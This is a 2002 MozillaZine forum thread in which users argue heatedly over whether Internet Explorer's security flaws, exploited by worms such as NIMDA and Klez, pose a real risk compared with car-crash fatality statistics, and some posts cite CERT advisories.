Also, your "simple math" is totally irrelevant. You stated said :

"Calculate, during the whole 1.2 million NIMDA accumulation period, the total number of web pages served to IE clients. Now get that number and divide it into to the total number of infected web pages served IE clients for the same period. How about for the past 6 months? The past 2 years? 4 years?"

Even if someone could simply calculate the total number of web pages served, it has no bearing on the discussion. If you came up with a ration between the number of web pages viewed by IE and the number of security compromises encountered then you would also have to calculate a ratio between the number of fatal car accidents and the total number of miles driven by everyone in the United States. Hardly simple math, but I'd be willing to bet that it would still show your claims to be invalid.

"Yet I am, somehow, supposed to relinquish simple common sense, reasoning, and perceptional abilities..."

It is rather obvious that you have already done that. You have your belief and you will continue to defend that belief despite common sense or reasoning, and to help in your defense you have choosen to disable any perceptive abilities that you might have and ignore the information that we have provided.

A logical argument consists of presenting facts and the logical implications of those facts. However you have not presented facts; instead you make claims based on your opinions, pose "rhetorical" questions that you do not want the real answers for, and make implications that you do not even attempt to give a basis for. There is no logic in an argument that continuously tries to redefine what the argument is about, but that is what you keep trying to do. There is no logic in an argument that misrepresents the opposing position in order to "prove" it wrong.

#129 Re: Re: Re: No

by kristen

Thursday July 11th, 2002 11:28 AM

Reply to this message

"You are misrepresenting what I said. "

Not in the least.

"all that I can say for sure is that the 24% were not from email."

That is exactly correct, no arguments there at all. All you can can say is that 24% were not from email. The operative word here being 'you'. I gave you, for arguments sake, the benefit that all 24% were from web browsing in your experience. I was being nice. ;) The point being that you can in no way, shape, or form extrapolate what 'you' encountered across that of hundreds of millions.

"Even if someone could simply calculate the total number of web pages served, it has no bearing on the discussion."

It has everything do do with the discussion. It has to do with the probabily of a person acquiring a virus/worm via web browsing with IE. You, like several others here I am sure, like to believe it is a simple cut and dry matter, when in fact it is not. It is far from it.

What's kind of interesting is last night I was rummaging around through older topics here and in the mozillazine forum reading topics, posts, replies, etc. All in kind of an effort to get a better handle on what the different people here are like, their 'fundamental views' so to speak, or perhaps you could even call it their MO's, especially of the ones participating in this thread.

One thing that I found kind of interesting is in regards to Asa Dotzler. A mozilla.org member who, from what I can tell, has been around for at least a year, probably more, and seems to be well liked, intelligent, rational, and, of course, a mozilla advocate. What I have noticed is that Asa doesn't appear to me to be a 'loose lips' kind of a person when it comes to forums. I have been hard pressed to find a topic/forum thread where he has posted even four comments/replies, and as far as real trolls go, they have very little chance of getting a single reply. Back to the interesting thing, in a period spanning several days, Asa Dotzler has posted at least 20 comments to me that total well over 5,000 words. Quite astonishing for such a cut and dry issue, wouldn't you say? (Sorry, but that was another rhetorical question). ;)

All I can say to you really is that if it hasn't dawned on you yet why I or any other experienced IE user hasn't stopped using IE because of the likes of NIMDA and W32.Klez at least you have a few clues. I understand that the sheer simplicity of it all must be a total shocker for you, but take comfort in knowing that you are not alone and that there are others here who are with you. Often, in small circles, people can go on ranting and raving about something so much that it gets blown out of perspective to the point that they have lost grasp of what they are talking about. ;)

#130 Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Thursday July 11th, 2002 5:45 PM

Reply to this message

"I have been hard pressed to find a topic/forum thread where he has posted even four comments/replies"

It doesn't usually take more than a few posts :)

You still haven't responded to this:

you praised IE and the coming IE 7 for it's feature set.

then arielb said: "is better security also coming soon in IE7? It sure is annoying having to download security updates all the time (especially since Windows update still doesn't support pause/resume)"

then you said: "I'm sure it will be even better.Then don't. What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck. Lot's of false info out there on the wild wild web (www)."

_Every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_. 86,000 eploits in a singe day, _all_ the result of an IE security hole. Even the exploits came via email were still an attacker taking advantage of an IE security hole, not an Outlook security hole. The latest MS security fix for WMP is also a fix for the IE cache. Most of MS's security problems for networked PC users are IE exploits. You went on to change your language to something more along the lines of "being compromised while surfing the web" and I'm OK with the change in direction (and have done what I can to point out the literature that claims there are serious risks to web surfers) but it would be nice to hear you admit that your original statement to arielb, as quoted above, was very probably incorrect. That is, unless you want to tell me that 86,000 infections in a single day out of the 400 million web surfers worldwide is a lower frequency than the 110 or so people killed in car wrecks in a single day of the 170 million registered drivers in the US (I couldn't find worldwide registered drivers stats but I think it's safe to say there are probably another hundred million or two outside of the US).

--Asa

#131 Re: Re: Re: Re: Re: No

by kristen

Thursday July 11th, 2002 11:31 PM

Reply to this message

"You still haven't responded to this:"

I have. Either you haven't read what I said or somehow just missed it. You keep comparing a number for a given day, such as 86,000, (a day or period that really feeds your security 'argument') and then you compare that to traffic fatalities for the same day/period. Finally, you turn around and say 'you see, you see, the statistics are terrible'.

The problem is that that type of reasoning is incorrect and that is what I have said at least twice already. What you need to do is look at the big picture here. It's kind of like someone saying that the chances of getting killed in a car wreck are higher than that of flying in a plane, and you saying 'no, wait, on 9/11/2001 600+ people were killed in a plane crash that day while only 110 were killed in a car wreck. The logic in your statistical reasoning is fundamentally flawed. ;)

#132 Regardless, 86,000 in one day > 42,000 in a year

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 2:34 AM

Reply to this message

You have not responded to Asa's point at all; if you truly believe that you have then you completely missed the point.

Asa provided a link to the documented fact that 42,000 people were killed during the course of a year. He also provided documentation showing that there were 86,000 NIMDA infections in a single day (and 1.2 million over the course of a few weeks).

Asa's statistical reasoning is not flawed at all; no matter how you look at it 86,000 is greater than 42,000. The fact that the 86,000 was just one day whereas the 42,000 was a whole year does not constitute a flaw.

Your reference to September 11 has no relevance; the problem with your comments there are that you are comparing statistics for a specific day that was an exception to the regular numbers. No one here has tried to compare the 86,000 to the number of fatal car wrecks on a specific day; it was compared to the number of fatalities for a whole year. It would take over 2 years for the number of auto accident fatalities to equal the number of people affected by NIMDA on that single day. It would take 30 years for the number of auto accident fatalities to add up to 1.2 million (which was the number of systems infected by NIMDA in a few weeks).

Just because you have said "that type of reasoning is incorrect" does not make it true. The facts are :

1) The number of people who travel in motor vehicles in a given day, week, month, or year is greater than number of people who access the Internet using Microsoft products in the same time frame.

2) In the past year, more people had their computers infected with NIMDA than were killed in car accidents.

3) In the past x years, more people had their computers infected with NIMDA than were killed in car accidents.

4) If IE was not on anyone's computer during the past year, then no one would have been infected by NIMDA.

5) NIMDA is not the only exploit that has taken advantage of IE vulnerabilities.

#134 Re: Regardless, 86,000 in one day > 42,000 in a year

by kristen

Friday July 12th, 2002 4:32 AM

Reply to this message

I'll sum it up for you real easy here. 86,000 in a day, 1.2 million in a couple of weeks. When compared to traffic deaths, your whole premise behind that is that those figures were a result of web browsing. You are heavily betting that because NIMDA could and did infect a web page that that is how and why it accumulated such a 'casualty' rate. You have no proof at all to show me that even 2% of that total was the result of web browsing.

Here's what I do know, though. I have seen other 'email only' virus/worms spread very rapidly, in a short period of time, even when a user was required to execute an attachment of the email. Simple common sense would dictate that something would spread even easier if a user didn't even have to execute an attachment. I also know that credible agencies such as SARC categorize both NIMDA and Klez as primarily 'mass mailing worms'.

As far as producing the number of web surfers to get a virus/worm via web surfing and comparing that to automobile fatality rates. You simply can't. There is, though, more than enough evidence to show how fast email viruses/worms spread, even when a user is required to execute an attachment. This is why I had repeatedly asked for any kind of significant data regarding virus/worms that were spread via web browsing only. The fact is, there isn't.

Another interesting thing during the course of reading the links posted here is the 'cost of viruses/worms'. Apparantly, Asa didn't bother to read much of a link he provided, but it was still interesting, nonetheless:

<http://www.wired.com/news…ture/0,1377,49681,00.html>

This was kind of off topic, kind of not, but it was interesting to read in that article all of the 'experts' who find such cost estimates absurd, some even questioning what most of those things are beyond being a nuisance. Anyways, it was the end of the article that made me giggle a bit:

<start>

"We're starting to hear reports from people, stating that they know for a fact that their co-workers are opening viruses to get a 'vacation day.'" Erbschloe said sometimes it's a deliberate act of sabotage because employees hate their job, or they just want to knock the network offline so that they can relax for a day.

"That may explain why even the 'dumb viruses' are as effective as they are."

<end>

Back to the main issue. Here is the real clincher that you may want to digest for a bit. Now that the focus is on statistics regarding being killed in a car wreck several times over, for arguments sake, what if I had said 'being killed in an accident.'

I'm all ears. ;)

#136 Wrong again

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 9:40 AM

Reply to this message

"When compared to traffic deaths, your whole premise behind that is that those figures were a result of web browsing."

No it is not. As Asa has explained more than once, the point is that those figures are all a result of a flaw in IE. Whether they were spread by web browsing or email, it was a flaw in IE that allowed the exploit to succeed.

"You have no proof at all to show me that even 2% of that total was the result of web browsing."

Well, you have given no proof of anything that you have claimed. Your 2% figure is pulled out of thin air and has no meaning whatsoever.

As I have pointed out that if as few as 3.6% of the 1.2 million NIMDA infections were the result of web browsing then the number of NIMDA infections would exceed the number of auto fatalities for the year. When you increase the timeframe to cover the entire year and to cover all IE exploits instead of just a few weeks of NIMDA, then percentage required goes down. It is likely that only 2% of all IE exploits for the year would exceed the number of auto fatalities.

Based on my personal experiences of dealing with NIMDA infected computers, servers, and websites, and based on all the articles that I have read, and all of the online discussions that I have been a part of, the evidence seems to indicate that the number of NIMDA infections fromm viewing web pages is well above 3.6% of the total. You have presented absolutely nothing that indicates otherwise. Can you provide a link showing where SARC or any other reputable agency indicates that web browsing constitutes a lessor percentage?

Regardless though, the point still is that 100% of the infections, via web or via email, are the result of an IE security hole. Without IE on the computer, you would be safe from NIMDA, Klez, and all of the other exploits that tuxracer presented.

"This was kind of off topic, kind of not, but it was interesting to read in that article all of the 'experts' who find such cost estimates absurd, some even questioning what most of those things are beyond being a nuisance."

The cost is undoubtably off topic and is totally irrelevant. However, anyone suggesting that virii/worms are just a nuisance is a moron.

"Now that the focus is on statistics regarding being killed in a car wreck several times over, for arguments sake, what if I had said 'being killed in an accident.'"

I would say that once again you are trying to change the point of the discussion. You made a claim and it was invalid; you can not validate yourself by trying to change what you said.

#138 Re: Wrong again

by kristen

Friday July 12th, 2002 10:57 AM

Reply to this message

"As Asa has explained more than once, the point is that those figures are all a result of a flaw in IE. Whether they were spread by web browsing or email, it was a flaw in IE that allowed the exploit to succeed."

Thank you, Subtle Rebel, for re-outlining, yet again, something that Asa said. I'm afraid that you are the one who is missing the point and your doing a good job of demonstrating how poor your reading skills are. The probability of contracting a virus/worm via a web page has everything to do with what I am saying. You see, I don't use Outlook Express for my email. I have it, but I don't use it. I have always used Netscape Messenger 4.X (currently 4.79) for my email. Truth be told, it has nothing to do with security either. I use it because I like the look/feel of it, the fact that I don't need to have Microsoft Office installed to have spell checking capability, a nice mail notification utility, and a decent newsreader that doesn't mangle posts I make to a newsgroup, amongst other things. Multiple pop accounts? I could care less, I have never personally had a need for more than one. I do, however, like IE and it is my default browser. I don't like Mozilla (sorry) and I like Mozilla Mail/News even less (not sorry) ;). I'm not about to get into a debate as to why (especially here) for that is an entirely separate issue. The point is, and one that you so far consistently miss despite me repeating it umpteen times, is that web browsing security is exactly the point.

"Well, you have given no proof of anything that you have claimed. Your 2% figure is pulled out of thin air and has no meaning whatsoever."

That's right, I did pull the 2% figure out of thin air. Here's another figure I'm going to pull out of thin air: You have no proof at all to show me that even 1% of that total was the result of web browsing. ;)

"As I have pointed out" (and all the rest)

You have pointed two things out to me. One being that you cannot read. The other being that you cannot read.

"I would say that once again you are trying to change the point of the discussion"

Somehow I kind of figured you would say something like that. Getting killed in an accident is irrelevant to the fundamental point being made here, getting killed several times over in a car wreck is the decisive factor. ;)

#141 Missed the point again

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 10:56 PM

Reply to this message

"Thank you, Subtle Rebel, for re-outlining, yet again, something that Asa said. ...[irrelevant stuff deleted] .... The probability of contracting a virus/worm via a web page has everything to do with what I am saying. ...[a whole lot more irrelevant stuff deleted] ... is that web browsing security is exactly the point. "

Regardless of how many times it is presented, you have missed the point that Asa asked you to respond to.

Regardless of what you are saying about contracting a virus/worm via a web page, those comments do not respond to the point that Asa made. Asa's point was that email infections are a result of IE flaws. and that telling someone that they do not need to worry about patching holes in IE security is very bad advice.

Whether or not you personally use Outlook is irrelevant to the discussion because it is not just about your personal chances of getting killed in a car wreck. We are talking about statistics regarding everyone who uses IE.

#143 Re: Re: Wrong again

by asa <asa@mozilla.org>

Friday July 12th, 2002 11:39 PM

Reply to this message

". The probability of contracting a virus/worm via a web page has everything to do with what I am saying. "

And you're changing your argument in the middle of the debate. What happened to your original claim? You said: "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck." You said nothing about browsing the web.

I'm guessing that after you were educated (by some mozillazine posts, and undoubtedly by your own research) you realized that the original argument was unwinnable so you changed your claims.

Or am I reading you wrong and you still stand by your original claim?

--Asa

#144 Re: Re: Re: Wrong again

by kristen

Saturday July 13th, 2002 3:15 AM

Reply to this message

"You said nothing about browsing the web."

Asa, you know as well as I that I did make that clear long long ago. Several days ago, in fact. ;)

"Or am I reading you wrong and you still stand by your original claim?"

I stand by the point that I have made. My style is common practice in the legal profession. Assert high, ask to understand, speak to be understood, then, finally, deliver the reality.

All that is left for you, or anyone else here, to do is to differentiate between a persons decision making when the risk to them is either getting killed in an accident, or in that of a car wreck several times over. ;)

#146 Legal profession

by SubtleRebel <mark@ky.net>

Saturday July 13th, 2002 10:51 AM

Reply to this message

I agree that your tactics are common in the legal profession, but aligning yourself with the legal profession really does not enhance your credibility.

It is common in the legal profession to distort reality in order to try to convince the jury to side with you.

It is common in the legal profession to misrepresent the facts and to try to twist quotes out of context in order to make it seem like the person said something different than what they actually said.

Those in the legal profession seldom use actual logic.

The legal profession ceased to be about truth and justice a long time ago; it is now about winning at any cost through manipulation and loopholes.

Unfortunately for you, this forum is more educated about the real facts of the case than a typical jury and so your tactics are not very effective here.

#149 Re: Re: Re: Re: Wrong again

by asa <asa@mozilla.org>

Saturday July 13th, 2002 12:02 PM

Reply to this message

I didn't ask you if you stand by the point you made. I asked you if you stand by the statement you made which I quoted and which started this whole thread. Do you stand by this statement "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck." If you do then just say so. If you don't then say so.

--Asa

#153 Re: Re: Re: Re: Re: Wrong again

by kristen

Monday July 15th, 2002 11:25 AM

Reply to this message

"I didn't ask you if you stand by the point you made."

Thank you, for acknowledging the point I made. ;)

#156 More of the same

by SubtleRebel <mark@ky.net>

Monday July 15th, 2002 3:02 PM

Reply to this message

Still taking quotes out of context in order to try to misrepresent what was said? Do you not realize how lame that is?

Anyway, making a point is not necessarily the same as making a valid point.

BTW, I also notice that once again you failed to respond to Asa's question.

#142 Re: Re: Regardless, 86,000 in one day > 42,000 in

by asa <asa@mozilla.org>

Friday July 12th, 2002 11:32 PM

Reply to this message

"When compared to traffic deaths, your whole premise behind that is that those figures were a result of web browsing. "

Wrong. Not "a result of web browsing". You're again tryin to change the the whole discussion.

You said: "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck."

And I'll repeat _Every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_.

How about you admit that your original statement doesn't hold water or tell me that you still stand by your original claim as quoted above.

--Asa

#145 Re: Re: Re: Regardless, 86,000 in one day > 42,000 in

by kristen

Saturday July 13th, 2002 9:54 AM

Reply to this message

"Wrong. Not "a result of web browsing". You're again tryin to change the the whole discussion. "

I'm afraid that you are the one who is wrong and I'm disappointed to see that you are now starting to sound like that other guy.

Since my first post following what you just quoted, which was Friday, July 5th, 2002 at 08:24:38 PM my assertion was made quite clear:

'I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/hers hearts content without being 'compromised' in the least'

That was over a week ago. What had happened, in case you have forgotten, was the topic was shifting more and more to email (I wonder why) of which I later got things back on track.

"And I'll repeat _Every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_. "

Now you are sounding like that other guy who entered the discussion late, thinking he had a clue as to what was going on.

"How about you admit that your original statement doesn't hold water or tell me that you still stand by your original claim as quoted above."

When someone starts tearing apart a statement in lieu of the point, I know they are getting desperate. The irony is, after all of this, that I don't really know if a person is more than likely to get killed in a car wreck several times over verses their system being compromised by browsing the web. The data presented has been interesting, but still nothing conclusive because it all rests on speculation via the likes of Klez and NIMDA visa vis email propogation. What I do know in regards to the point that I have made, is that a person is more than likely to get killed than have their system compromised via web browsing with IE. The ultimate point being that the 'safer browsing with mozilla' argument is a very weak sales pitch.

In case you have been wondering why the world isn't knocking on the lizards door in the name of 'securer browsing' at least now you know. Whether you, or any other mozilla advocate/user/devotee, care to come to terms with this reality is more of a spiritual issue than anything else. I can't help you there. :(

Good day, gentlemen. ;)

#147 Re: Re: Re: Re: Regardless, 86,000 in one day > 42

by SubtleRebel <mark@ky.net>

Saturday July 13th, 2002 10:58 AM

Reply to this message

"That was over a week ago. What had happened, in case you have forgotten, was the topic was shifting more and more to email (I wonder why) of which I later got things back on track."

You wonder why the topic was shifting? It was because you were trying to shift it; we were trying to keep it on track the whole time.

If you would care to actually read the posts, it was you who kept bringing up email. It was you who kept trying to bring Melissa and ILOVEYOU into the discussion when they had no relevance. It was you who kept trying to ignore tuxracer's list of IE exploits that have NOTHING to do with email. It was you who continuously ignored the fact that NIMDA and Klez are the result of an IE flaw.

#148 Contradicting yourself or changing topic again?

by SubtleRebel <mark@ky.net>

Saturday July 13th, 2002 11:07 AM

Reply to this message

The following two quotes are from the same paragraph of your above post:

"The irony is, after all of this, that I don't really know if a person is more than likely to get killed in a car wreck several times over verses their system being compromised by browsing the web."

"What I do know in regards to the point that I have made, is that a person is more than likely to get killed than have their system compromised via web browsing with IE."

Are you contradicting yourself, or are you changing your argument so that it covers being killed under any circumstances?

Maybe you should change it to "a person is more likely to die than to be compromised by browsing the web" because I am sure we would all agree to that.

#150 Re: Re: Re: Re: Regardless, 86,000 in one day > 42

by asa <asa@mozilla.org>

Saturday July 13th, 2002 12:10 PM

Reply to this message

"I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/hers hearts content without being 'compromised' in the least' "

But arielb would be compromised. There are any number of ways that arielb would be compromised including NIMDA. That you don't understand this is getting tiresome. Arielb could be compromised by the simple act of browsing the web, by using Outlook, Outlook Express or Windows Media Player. All of these potential exploits are the fault of security flaws in IE.

Your first quote following the one I posted was the beginning of your shifting your argument to something a little less doomed. I'm still curious if you stand by the statement you made which started this entire thread. You started this thread with an assertion which is patently false and you're running away from it. I'm OK with you abandoning that silly assertion and moving back to other threads. A simple "I was wrong in my original assertion but the rest of what I said I still stand by" will do.

In case you want to read it again while you ponder your answer: "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck."

--Asa

#154 Re: Re: Re: Re: Re: Regardless, 86,000 in one day > 42

by kristen

Monday July 15th, 2002 11:33 AM

Reply to this message

"But arielb would be compromised. There are any number of ways that arielb would be compromised including NIMDA."

Your use of the word 'would' has more holes than a 10 pound block of swiss cheese. Better phrased 'it is possible that arielb could encounter a web page that compromises his/her security, but he/she is more likely to get killed first'

Now we have two phrases to pick at. Getting killed in a car wreck several times over, and the number of holes in 10 pound block of swiss cheese. ;)

#157 Do you understand "context" ??

by SubtleRebel <mark@ky.net>

Monday July 15th, 2002 3:09 PM

Reply to this message

Why do you insist on taking quotes out of context and then trying to dissect them? Are you just incapable of arguing based on the actual issue?

Oh yeah, thats right, if you actually tried to argue the merits of your position, you would have nothing to say.

#133 Re: Re: Re: Re: No

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 2:40 AM

Reply to this message

> "You are misrepresenting what I said. "

> Not in the least.

Give me a break. You stated "...Subtle Rebel over at Mozillazine has determined that the infection via web page rate was 24% because that's his experience..." That is a misrepresentation of what I said. Period.

#135 Re: Re: Re: Re: Re: No

by kristen

Friday July 12th, 2002 6:15 AM

Reply to this message

"Give me a break."

I thought I did.

Perhaps I should have said 100% given the subject of your just prior post: 'Regardless, 86,000 in one day > 42,000 in a year' ;)

#137 Huh?

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 9:58 AM

Reply to this message

Huh?

Are you claiming that you gave me a break because you did not lie as much as you could have?

You twisted what the 24% represented in my earlier post, but now you suggesting that you should have misquoted me further by changing the percentage value itself?

Why not just debate what I actually said instead of trying to make up things? I know it is easier for you to disprove the stuff that you make up, but when the whole thread is here for people to read, they can easily see what you are doing and it really makes you look bad.

#139 Re: Huh?

by kristen

Friday July 12th, 2002 11:03 AM

Reply to this message

I am really kind of wishing I followed my earlier suspicion that you are well worth ignoring.

#140 Choices

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 10:42 PM

Reply to this message

I'd rather have you ignore my posts than have you keep trying to make it sound like I said something different than what I have said.

#114 NIMDA does not require email

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 12:58 AM

Reply to this message

As I pointed out in detail in previous posts ( <http://www.mozillazine.or…=2329&message=103#103> ) and ( <http://www.mozillazine.or…=2329&message=104#104> ), I have personally dealt with major infections of NIMDA that have no connection whatsoever to email.

It is a mistake to think that NIMDA is only spread by email; I am inclined to believe that email is not even the primary method by which NIMDA is spread. As I have stated before, due to user ignorance, it is virtually impossible to determine the primary means by which it is spread. The only thing that we know for certain is that using Mozilla for email and web browsing will protect your workstation from being damaged from any of the IE and Outlook exploits.

#113 This is getting absurd

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 12:42 AM

Reply to this message

>Actually, you haven't. All you, and others, have done are site examples that >involved email in one form or another. Everything that has been cited is >first described by SARC as 'mass mailing worms' who have payloads of 'large >scale emailing'.

That is pure BULL.

In addition to NIMDA and Klez which are spread via web browsing (email involvement is NOT required), there have also been various examples of IE exploits that have absolutley nothing to do with email.

Either you have not been paying any attention to the posts and links provided, or you are intentionally ignoring them; in either case, the information has been repeated often enough.

>We all know the devastation of email worms such as Melissa and ILOVEYOU even >though they required the user to execute an attachment. Now imagine the >consequences of something that only requires a person to view the email.

IIRC, you are the only one who has ever mentioned Melissa or ILOVEYOU in this thread. Everyone else has been giving you examples of virii/worms/exploits that can be triggered by simply viewing a web page or alternately by simply viewing an email.

NIMDA and Klez are both widespread examples of the consequences of something that only requires a person to view and does not require the user to execute anything other than their Microsoft software.

If you continue to persist in your blind ignorance then so be it, but we have provided more than enough evidence to refute your claims in the eyes of any sane person.

#116 Re: This is getting absurd

by kristen

Wednesday July 10th, 2002 1:24 AM

Reply to this message

"If you continue to persist in your blind ignorance then so be it"

Have you noticed yet that I'm ignoring you?

#118 Ignoring

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 3:25 AM

Reply to this message

>"If you continue to persist in your blind ignorance then so be it"

>Have you noticed yet that I'm ignoring you?

Well, I had noticed that you were ignoring the facts, but I could not be sure whether or not you were specifically ignoring me because you also seem to be ignoring the facts presented by tuxracer and Asa and others.

Also, you can not be ignoring me totally if you are replying to some of my posts.

Lastly, the fact that you have now admitted that you have attempted to ignore the information that has been presented only serves to prove that you are indeed intentionally trying to hold on to your ignorance. That being the case, further discussion is a waste of time.

#119 Re: Ignoring

by kristen

Wednesday July 10th, 2002 4:23 AM

Reply to this message

Ya know, there really isn't any need to be so abrasive. If you would have taken the time to follow your own advice and read this thread yourself, rather than accusing me of not knowing the facts, you would see that I already know that 'NIMDA does not require email'.

All you and tuxracer have done is repeat what I already know, with links to pages I have already read (including links that link to another post within this same thread). This was my reason for not replying to tuxracer and most of the reason I didn't reply to you (I've sensed somewhat of an obnoxious 'air' to you that I don't really don't want to waste my time with, sorry :( ).

I guess that's all I really have to say to you. At least I'm not ignoring you in this specific instance. ;)

#120 Re: Re: Ignoring

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 4:38 AM

Reply to this message

>rather than accusing me of not knowing the facts, you would >see that I already know that 'NIMDA does not require email'.

If you already know the facts then why do you keep denying them?

You have stated more than once that no one has posted about any non-email related threat; that is blatantly untrue.

> I've sensed somewhat of an obnoxious 'air' to you that I > don't really don't want to waste my time with, sorry :(

Hmmm, interesting.

It was specifically because of your obnoxious 'air' that I felt compelled to enter into this discussion in the first place.

#121 Offtopic : MozillaZine reformatting text

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 4:43 AM

Reply to this message

Can anything be done to prevent carriage returns from being ignored in these Talkback posts? It does not seem to be particularly consistant, but it does happen rather frequently here. I have not really noticed it happenning in the forums section though which apparently uses different code.

#125 Re: Offtopic : MozillaZine reformatting text

by AlexBishop <alex@mozillazine.org>

Wednesday July 10th, 2002 6:07 PM

Reply to this message

"Can anything be done to prevent carriage returns from being ignored in these Talkback posts?"

There's no way to get a single line break in a post. However, you can start a new paragraph by using two carriage returns.

"I have not really noticed it happenning in the forums section though which apparently uses different code."

The Talkback Forums are powered by Phorum. The article Talkback system was custom-written by Chris.

Alex

#122 Re: Re: Re: Ignoring

by kristen

Wednesday July 10th, 2002 5:00 AM

Reply to this message

"If you already know the facts then why do you keep denying them?"

I haven't. It is the interpretation of the facts where the disagreement lies.

"You have stated more than once that no one has posted about any non-email related threat; that is blatantly untrue."

Someone hasn't been reading. ;)

#104 Are you paying attention?

by SubtleRebel <mark@ky.net>

Tuesday July 9th, 2002 4:23 AM

Reply to this message

> "You are indeed very silly (perhaps another word would be better) > if you honestly believe that the fact that we have not produced > a list of sites that compromise your security" > > I guess I'm silly. ;) What has not been produced are cases > of widespread security issues involving web browsing.

NIMDA and Klez are both spread via web browsing with IE; you do not have to use Outlook in order to get infected. I have seen several cases where the infected user was using Lotus Notes for their email and IE for web browsing. How do you propose that these people were infected? (remember now, it is not possible to get infected via Lotus Notes.)

tuxracer provided you with several links to websites detailing various IE vulnerabilities; the majority of these involve IE only exploits and have nothing to do with email. You claim that you have little chance of encountering one of these exploits, but you have nothing to base that claim on. Would you even know it if you were exploited? How would you know? The average user most certainly would have no clue and would have no way to trace their problems back to a website.

#89 Re: tuxracer's comparison

by tuxracer

Monday July 8th, 2002 11:25 AM

Reply to this message

"No one has said a single thing to refute this. I'll give you a hint as to why -> Because you can't. ;)"

Uh... <http://www.mozillazine.or…le=2329&message=45#45>

#57 Re: Re: Re: Re: Re: Re: Not my experience

by niner

Sunday July 7th, 2002 3:35 AM

Reply to this message

"Not only can no one provide any real-world information regarding websites exploiting IE security holes to compromise a users system, the best that can be had so far is some obscure 'exploit' that sounds like the most dangerous and effective thing in the world yet is reported nowhere, other than the same initial 'report' being quoted several times over."

Am I wrong or did Nimda exactly that? It didn't require you to start anything. Just opening an infected mail in Outlook or _visiting an infected website_ was enough to get the virus. It spread all over the world and still exists and pops up here and there.

Btw. you think only Mozilla advocates are so serious about security? That's interesting, because even Microsoft did admit this February that their products need a security overhaul and announced this great new security stradegy. Do you think that Bill Gates is a new Mozilla advocate?

#68 Re: Re: Re: Re: Re: Re: Not my experience

by SubtleRebel <mark@ky.net>

Sunday July 7th, 2002 12:16 PM

Reply to this message

First of all, Klez (<http://www.kb.cert.org/vuls/id/980499>) and Nimda (<http://www.cert.org/advisories/CA-2001-26.html>) are both triggered by simply viewing/previewing an email with Outlook or viewing a web page with IE. It is not necessary for the user to click on anything or execute any attachment. These threats did indeed top the charts left and right.

Also MS IE's buffer overrun vulnerability (<http://www.cert.org/advisories/CA-2002-04.html>) is triggered by simply viewing a web page.

As for Help.Dropper, it is just an example of the recently discovered flaw. It is rather naive to think that you would find an exploit in the wild by doing a search for Help.Dropper in Google. Anyone maliciously using that method would be stupid to advertise it by referencing the name Help.Dropper in their code or on their website. Also due to how this vulnerability works, most users would not be likely to trace an infection back to the source. The sample given does not show itself until you reboot the computer, so why would users think that it was related to an email or webpage that they had viewed sometime during a previous Internet session?

#75 Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 5:35 PM

Reply to this message

Ok, tell you what, to all ->

<kristen_m@prodigy.net>

WinXP Pro, NTFS, IE6/OE6

Bomb away. ;)

#77 Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Sunday July 7th, 2002 8:09 PM

Reply to this message

We're the good guys. We don't attack users ;-)

Do you run any anti-virus software or a personal firewall? Has it ever located any virus or intrusion on your machine? Do you know anyone that has ever had a virus on his/her machine? If your answer to these questions is no then you're in the extreme minority.

--Asa

#80 Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 8:41 PM

Reply to this message

"We're the good guys. We don't attack users ;-)"

By all means please make your point. ;)

"Do you run any anti-virus software or a personal firewall?"

Yes.

"Has it ever located any virus or intrusion on your machine?"

Yes.

"Do you know anyone that has ever had a virus on his/her machine?"

Yes.

Did any of this occur via viewing a web page or simply opening an email? No. Back at you: "If your answer to these questions is yes then you're in the extreme minority." ;)

#84 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Sunday July 7th, 2002 10:55 PM

Reply to this message

How then did your system get infected? Did you or anyone you know get NIMDA? Here's how NIMDA worked:

1. from client to client via email 2. from client to client via open network shares 3. from web server to client via browsing of compromised web sites 4. from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities (VU#111677 and CA-2001-12) 5. from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms <http://www.cert.org/body/…es/CA200126_FA200126.html>

